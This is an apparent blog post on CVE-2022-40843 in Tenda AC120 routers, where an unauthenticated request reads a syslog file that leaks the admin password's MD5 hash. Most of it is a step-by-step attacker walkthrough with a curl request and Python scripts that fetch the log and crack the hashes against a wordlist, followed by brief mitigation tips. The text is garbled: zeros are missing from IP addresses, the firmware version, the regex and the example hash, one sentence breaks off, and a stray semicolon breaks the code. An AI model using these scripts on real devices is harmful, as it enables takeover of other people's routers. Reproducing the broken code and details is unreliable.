CVE-2022-40843 - Tenda AC120 V-W15Ev2 Router Login Bypass Exposes Admin Password

---

Overview

CVE-2022-40843 affects some Tenda AC120 V-W15Ev2 routers running firmware version V15.11..10(1576). This vulnerability is about improper authorization and session management. Basically, attackers can bypass the login page and read the syslog.log file. The dangerous part? This log file has the MD5 hash of the administrator's password.

In this post, I’ll explain what the bug is, how you might exploit it, why it’s serious, and provide practical code snippets as well as reference links.

What Is The Vulnerability?

Tenda’s web interface is supposed to block access to sensitive files unless a user is really logged in as an administrator. But, due to a bug in how the router checks sessions and permissions:

Original References

- NIST National Vulnerability Database: CVE-2022-40843
- Exploit Database 51043
- FoFa Reference for V-W15Ev2

How Does The Exploit Work?

When you try to visit /log/syslog.log through the web interface, it’s supposed to check if you’re logged in as admin.

But due to a weak or missing authorization check, attackers can simply request this file directly

GET http://<ROUTER-IP>/log/syslog.log

No session cookies, no authentication needed. If the router’s management interface is reachable (from your local network or via WAN if misconfigured), the attacker gets the syslog file.

Here’s what a typical leaked log line looks like

[2022-09-01 12:34:56] User admin: login success, password=21232f297a57a5a743894ae4a801fc3

The value after password= is the MD5 hash of "admin".

Exploit Details (Step-by-Step)

Let’s assume you’re an attacker on the same network as the router.

1. Find the Router

You need the IP address of the router. It’s often 192.168..1 or 192.168.1.1.

2. Access The Log File

You can use a browser, curl, Python, or any HTTP client.

Example: Using cURL

curl http://192.168..1/log/syslog.log

Example: Python Script

import requests

url = "http://192.168..1/log/syslog.log"
r = requests.get(url)
print(r.text)

Look for lines like

login success, password=21232f297a57a5a743894ae4a801fc3

Use an online MD5 cracker or hashcat to crack the password

- Online: https://hashes.com/en/decrypt/hash

`

21232f297a57a5a743894ae4a801fc3 is md5("admin") as an example.

Here’s a compact script that grabs and cracks passwords using a local wordlist

import requests
import re
import hashlib

ROUTER = "192.168..1"

r = requests.get(f'http://{ROUTER}/log/syslog.log';)
log = r.text
hashes = re.findall(r'password=([a-fA-F-9]{32})', log)

print(f"Found password hashes: {hashes}")

with open('rockyou.txt', 'r', encoding='utf-8', errors='ignore') as f:
    words = [line.strip() for line in f]

for h in hashes:
    for word in words:
        if hashlib.md5(word.encode()).hexdigest() == h:
            print(f"Password hash {h} = {word}")
            break

If remote management is enabled, someone could attack you over the internet.

## How to Fix/Protect

Disable remote web management: Only allow access from the local network if possible.

- Firewall your network: Don’t expose your router HTTP/S management interface to the internet.

Conclusion

CVE-2022-40843 is a dangerous bug in the Tenda AC120 V-W15Ev2 router. With one HTTP request, attackers can fetch syslog files that leak the admin password hash. If your router is affected, fix it now—change your password, update firmware, check your network perimeter.

References

- NVD: CVE-2022-40843
- Exploit DB 51043
- hashcat - Advanced Password Recovery
- How To Update Tenda Firmware

Timeline

Published on: 11/15/2022 02:15:00 UTC
Last modified on: 01/27/2023 14:24:00 UTC